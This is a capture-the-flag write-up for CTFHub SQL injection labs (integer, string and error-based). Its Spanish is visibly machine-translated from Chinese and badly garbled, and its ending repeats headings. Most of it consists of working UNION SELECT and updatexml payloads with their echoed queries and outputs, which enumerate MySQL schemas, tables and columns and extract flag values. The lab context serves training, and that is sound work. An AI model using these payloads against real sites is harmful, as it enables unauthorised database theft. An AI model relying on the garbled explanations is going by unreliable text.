Hoy ctfhub de terminar el proceso de solución de inyección SQL varios problemas, todavía es más detallada.

Es de conocimiento relativamente común: el conocimiento de cada tema se refiere en general explicarse por una forma

! Nota: la siguiente tabla information_schema.xxxxxxxxxxxxxx se expresan en la biblioteca INFORMATION_SCHEMA

Tales como: esquemas, tablas y similares, no se especifique lo contrario en la tabla se refiere al repositorio de datos información

Hay preguntas aquí que la integración ctfhub del bien, así que todo base de datos y tabla incluye nombres de campo son los mismos, no ser perezoso.

Palabra clave / Declaración / Función	explicación
union select	La investigación conjunta, inyección common conjunta
base de datos()	Echo base de datos conectada
versión()	La vista SQL de la versión actual, tales como: MySQL 1.2.3, 4.5.6-MariaDB
GROUP_CONCAT ()	El mismo grupo de valores generados, conectados para formar una cadena
INFORMATION_SCHEMA	Guardar una gran cantidad de información de base de datos MySQL
information_schema.schemata	Una biblioteca de mesa INFORMATION_SCHEMA, llamados esquemas
schema_name	esquemas almacena en la base de datos MySQL tabla de todos los nombres de los campos
INFORMATION_SCHEMA.TABLES	Me salvó toda la tabla mysql
esquema_tabla	Cada tablas de la base almacenados en la tabla correspondiente al campo nombre de la tabla
nombre de la tabla	El nombre de la tabla y de una sola esquema_tabla
INFORMATION_SCHEMA.COLUMNS	Columnas de la tabla mantienen todas las columnas de una 4
COLUMN_NAME	Cuando se conoce el nombre de una tabla, los nombres de todos los campos disponibles (nombre de la columna) de la tabla en el momento en el campo
nombre de la tabla	Nombre de la mesa y la correspondencia COLUMN_NAME
seleccionar updatexml (1, concat (0x7E, base de datos () , 0x7e), 1);	Tenga en cuenta que aquí, solamente () en el contenido que desea cambio en el error DATABSE puede hacer eco
derecha (str, num)	NUM caracteres cadena de interceptación a partir de la derecha
izquierda (str, num)	Parecida: NUM caracteres de Cuerda de la interceptación izquierda
substr (str, N, M)	String, a partir de la N-ésima carácter, símbolos M tomadas

inyección número entero 1.SQL

Explosión base de datos actual

4 union select 3,database()

select * from news where id=4 union select 3,database()
ID: 3
Datos: sqli

De acuerdo con information_schema.schemata toda la base de datos de ráfaga
```
4 union select 3,group_concat(schema_name) from information_schema.schemata
```
select * from news where id=4 union select 3,group_concat(schema_name) from information_schema.schemata
ID: 3
Datos: INFORMATION_SCHEMA, MySQL, performance_schema, sqli

Según INFORMATION_SCHEMA.TABLES y conocido nombre de la base sqli mesa de estallido

4 union select 3,group_concat(table_name) from information_schema.tables where table_schema="sqli"

select * from news where id=4 union select 3,group_concat(table_name) from information_schema.tables where table_schema="sqli"
ID: 3
Datos: noticias, bandera

Conocer la mesa de la bandera, fue a los campos como INFORMATION_SCHEMA.COLUMNS explosivos sin detonar nombre de la tabla y la bandera
```
4 union select 3,group_concat(column_name) from information_schema.columns where table_name="flag"
```
select * from news where id=4 union select 3,group_concat(column_name) from information_schema.columns where table_name="flag"
ID: 3
Datos: bandera

5. Conocer el campo de la bandera de esa manera, y compruebe el contenido en su interior directamente

4 union select 3,group_concat(flag) from sqli.flag

select * from news where id=4 union select 3,group_concat(flag) from sqli.flag
ID: 3
Datos: ctfhub {} cf0c7df79d5f387aca776784bb5cfaebf98980f0

inyección de carácter 2.SQL

El número de columnas explosivos, pero no se rompen, porque el eco en dos: Identificación, DATOS

3' union select database(),version() #

nombre de la biblioteca explosión
```
3' union select database(),group_concat(schema_name) from information_schema.schemata #
```
Echo: Nombre de la base sqli

select * from news where id='3' union select database(),group_concat(schema_name) from information_schema.schemata #'
ID: sqli
datos: INFORMATION_SCHEMA, performance_schema, MySQL, sqli
nombres de las columnas de explosión
```
3' union select database(),group_concat(table_name) from 
information_schema.tables where table_schema='sqli' #
```
tabla de eco: bandera

select * from news where id='3' union select database(),group_concat(table_name) from information_schema.tables where table_schema='sqli' #
ID: sqli
datos: noticias, bandera
Explosión nombre del campo
```
3' union select database(),group_concat(column_name) from 
information_schema.columns where table_name='flag' #
```
回显字段名: bandera de
seleccionar * de noticias donde id = '3' union select base de datos (), GROUP_CONCAT (nombre_columna) de INFORMATION_SCHEMA.COLUMNS donde nombre_tabla = 'bandera' #'
ID: sqli
datos: bandera
Explosión nombre del campo
```
3' union select database(),group_concat(flag) from sqli.flag #'
```
select * from news where id='' union select database(),group_concat(flag) from sqli.flag #'
ID: sqli
datos: ctfhub {} 4f0e4923b55e73aa9a1a5fd66fb88b13a1e9e7f2

inyección error 3.SQL

Explosión base de datos actual

1 union select updatexml(1,concat(0x7e,database(),0x7e),1); #

Burst todas las bases de datos, prestar atención a utilizar soportes para envolver la línea

1 union select updatexml(1,concat(0x7e,
(select(group_concat(schema_name))from information_schema.schemata) 
,0x7e),1); #

Todo parte de la base de datos de eco, no encontró eco nombre sqli, por lo que definitivamente volver longitud limitada obvio, antes utilizado antes, substr, izquierda, mediados de, y las funciones correctas

select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(schema_name))from information_schema.schemata) ,0x7e),1); #
Consulta de error: error de sintaxis XPath: '~ INFORMATION_SCHEMA, MySQL, perfor'

Tenga en cuenta que el carácter de vuelta parecía Longitud máxima: 32

31 caracteres a la derecha de la explosión y encontrado solapamiento,
```
1 union select updatexml(1,concat(0x7e,right( 
(select(group_concat(schema_name))from information_schema.schemata)
,31 ),0x7e),1); #
```
select * from news where id=1 union select updatexml(1,concat(0x7e, right((select(group_concat(schema_name))from information_schema.schemata) ,31) ,0x7e),1); #
Consulta de error: error de sintaxis XPath: '~ a, MySQL, performance_schema, sqli'

Así que en total: INFORMATION_SCHEMA, MySQL, performance_schema, SQLi cuatro bases de datos
mesa de estallar

1 union select updatexml(1,concat(0x7e,
(select(group_concat(table_name))from information_schema.tables where table_schema="sqli")
,0x7e),1); #

select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(table_name))from information_schema.tables where table_schema="sqli") ,0x7e),1); #
Consulta de error: error de sintaxis XPath: ' _{Noticias, Bandera} '

nombres de las columnas de explosión

1 union select updatexml(1,concat(0x7e, (select(group_concat(column_name))from information_schema.columns where table_name="flag") ,0x7e),1); #

select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(column_name))from information_schema.columns where table_name="flag") ,0x7e),1); #
Consulta de error: error de sintaxis XPath: ' _Bandera '

contenido de explosión

Una porción de la bandera:

1 union select updatexml(1,concat(0x7e, (select(group_concat(flag)) from sqli.flag) ,0x7e),1); #

select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(flag)) from sqli.flag) ,0x7e),1); #
Query Error: error de sintaxis XPath: '~ {ctfhub 2333ee20c980f72952ce65c4'

Otra parte de la bandera:

1 union select updatexml(1,concat(0x7e, right((select(group_concat(flag)) from sqli.flag) ,31),0x7e),1); #

select * from news where id=1 union select updatexml(1,concat(0x7e, right((select(group_concat(flag)) from sqli.flag) ,31),0x7e),1); #
Consulta de error: error de sintaxis XPath: '~ 80f72952ce65c494ec82b147e9940d}'

bandera de empalme: ctfhub {} 2333ee20c980f72952ce65c494ec82b147e9940d

inyección [Ctfhub] SQL

Hoy ctfhub de terminar el proceso de solución de inyección SQL varios problemas, todavía es más detallada.

inyección número entero 1.SQL

inyección de carácter 2.SQL

inyección error 3.SQL

Supongo que te gusta